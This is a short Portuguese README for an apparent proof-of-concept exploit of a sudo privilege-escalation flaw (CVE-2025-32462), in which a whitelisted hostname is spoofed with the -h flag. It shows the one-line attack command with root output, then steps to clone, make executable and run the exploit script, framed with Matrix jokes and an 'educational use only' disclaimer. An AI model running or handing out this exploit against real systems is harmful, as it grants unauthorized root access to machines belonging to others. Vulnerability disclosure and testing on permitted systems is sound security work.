
CVE-2025-32462 Exploit
Escalonamento de Privilégios por Spoofing de Hostname (CVE-2025-32462)
"Você toma a pílula azul... a história acaba. Você toma a pílula vermelha... você obtém root."
Este exploit demonstra uma vulnerabilidade de escalonamento de privilégios no sudo (CVE-2025-32462) onde restrições baseadas em hostname podem ser contornadas usando a flag -h. O PoC cria um ambiente de usuário restrito e, em seguida, escapa dele ao falsificar um hostname na lista de permissões para obter acesso root.
[user@matrix-node]$ sudo -h zion-core bash # Falsifica hostname na lista de permissões
[root@matrix-node]# id # Conseguiu root no hostname errado!
uid=0(root) gid=0(root) groups=0(root)
Clonar repositório:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
Tornar executável e executar:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
Siga os prompts interativos para demonstrar:
Apenas para fins educacionais/de pesquisa. Use apenas em sistemas próprios ou com permissão para testar.